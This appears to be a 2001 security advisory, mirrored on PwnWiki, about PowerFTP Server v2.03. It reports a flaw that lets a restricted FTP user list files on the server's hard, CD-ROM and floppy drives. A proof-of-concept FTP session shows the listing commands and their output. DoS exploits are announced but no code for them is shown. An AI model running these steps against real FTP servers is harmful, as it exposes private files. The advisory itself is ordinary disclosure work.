PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
INFO
------oOo------ PowerFTP Server data revealing sensitive on DRIVES remotes and Denial of Service Vulnerability (Released exploits Codes). ------oOo------ PowerFTPServer for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to see and retrieve any file on the server. Exploit information included. Company Affected: www.CooolSoft.com Version: v2.03 Date Added: 08-28-01 Size: 1.83 MB OS Affected: Windows 95/98/NT/2000 Author: ** Alex Hernandez <email protected> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins ** G.Maggiotti & H.Oliveira. ----=Brief Description=------------ PowerFTP Server is an FTP server for Windows 9x/NT/2000. A bug allows any user to change to any directory and see files to PATH also GET files remotely. ----=Summary=---------------------- PowerFTP is a powerful FTP client/server software. The feature of PowerFTP is the function of multiple thread downloading and uploading. it can even split one big file into several parts, and it can make your computer as a standard FTP server but exist a big HOLES: 1) Reveling data sensitive REMOTE with account restricted on Drives CDROM. Floppy and HDD Proof of concept. 2) Exploit code data revealing (Remote). 3) Remote DoS proof of concept. 4) Exploit code DoS (Remote). 5) Exploit code DoS attack Floppy Drive (Remote). ------oOo------ Proof of concept # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # ftp 10.0.0.1 Connected to 10.0.0.1. 220 Personal FTP Server ready Name (10.0.0.1:root): temp 331 Password required for temp. Password: 230 User temp logged in. ftp> ------oOo------ Exist another method for view "c:\" drive type the next: ------oOo------ ftp> ls c:/ 200 Port command successful. 150 Opening data connection for directory list. SUHDLOG.DAT COMMAND.COM BOOTLOG.PRV FRUNLOG.TXT DOS ... ------oOo------ For list the files CDROM drive type the next: ------oOo------ ftp> ls d:/ 200 Port command successful. 150 Opening data connection for directory list. 00000001.LT1 AREF AUTORUN.EXE AUTORUN.INF AUTORUN.INI CLCD16.DLL CLCD32.DLL CLUF.TXT D6F04BA8.BIN DPLAYERX.DLL DRVMGT.DLL EE EEAUTO.ICO ... ------oOo------ For list the files Floppy drive type the next: ------oOo------ ftp> ls a:/ 200 Port command successful. 150 Opening data connection for directory list. NOTE: If not exist Diskket, u can listen how to run the Drive :-). ------oOo------------------------------------ Vendor Response: The vendor was notified email protected http://www.cooolsoft.com Patch Temporary: Restricted files and Directories. Alex Hernandez <email protected> (c) 2001. ------oOo------------------------------------
免费、自由、人人可编辑的漏洞库--pwnwiki.com
